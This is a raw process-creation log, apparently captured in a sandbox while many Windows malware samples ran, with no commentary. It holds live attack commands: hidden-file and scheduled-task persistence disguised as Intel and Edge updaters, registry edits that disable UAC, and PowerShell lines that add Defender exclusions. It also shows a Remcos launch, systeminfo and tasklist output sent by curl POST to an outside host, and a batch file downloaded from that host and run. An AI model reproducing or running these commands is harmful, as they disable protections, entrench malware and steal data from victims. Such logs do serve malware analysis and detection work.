"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\Desktop\Files\surfex.exe

"C:\Users\Admin\Desktop\Files\surfex.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\Files\surfex.exe

"C:\Users\Admin\Desktop\Files\surfex.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\Files\surfex.exe

"C:\Users\Admin\Desktop\Files\surfex.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\Desktop\Files\Identification-1.exe

"C:\Users\Admin\Desktop\Files\Identification-1.exe"

C:\Users\Admin\Desktop\Files\87f3f2.exe

"C:\Users\Admin\Desktop\Files\87f3f2.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"

C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe

"C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe"

C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp" /SL5="$30314,3849412,851968,C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"

C:\Users\Admin\Desktop\Files\onetap.exe

"C:\Users\Admin\Desktop\Files\onetap.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe"

C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe

"C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe"

C:\Users\Admin\Desktop\Files\Mswgoudnv.exe

"C:\Users\Admin\Desktop\Files\Mswgoudnv.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe"

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\2DTJEUS2DTRQ" & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe"

C:\Users\Admin\Desktop\Files\Mswgoudnv.exe

"C:\Users\Admin\Desktop\Files\Mswgoudnv.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_6516_133785013895310577\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" "C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe"

C:\Users\Admin\Desktop\Files\setup.exe

"C:\Users\Admin\Desktop\Files\setup.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt

C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\Desktop\Files\svchost.exe

"C:\Users\Admin\Desktop\Files\svchost.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\onefile_7532_133785013970182163\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\svchost.exe'

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"

C:\ProgramData\Remcos\remcos.exe

C:\ProgramData\Remcos\remcos.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe

"C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\S0HVS2V3W4E3" & exit

C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp133B.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp133B.tmp.bat

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\Desktop\Files\wow.exe

"C:\Users\Admin\Desktop\Files\wow.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 336 -ip 336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 336 -s 1732

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\O8GDJEKN7YCJ" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\System32\GameBarPresenceWriter.exe

"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcc0f446f8,0x7ffcc0f44708,0x7ffcc0f44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcc0f446f8,0x7ffcc0f44708,0x7ffcc0f44718

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Users\Admin\Desktop\New Text Document mod.exse\a\SH.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\SH.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Systenn.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Systenn.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5477233236301179200,12933220128853594848,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

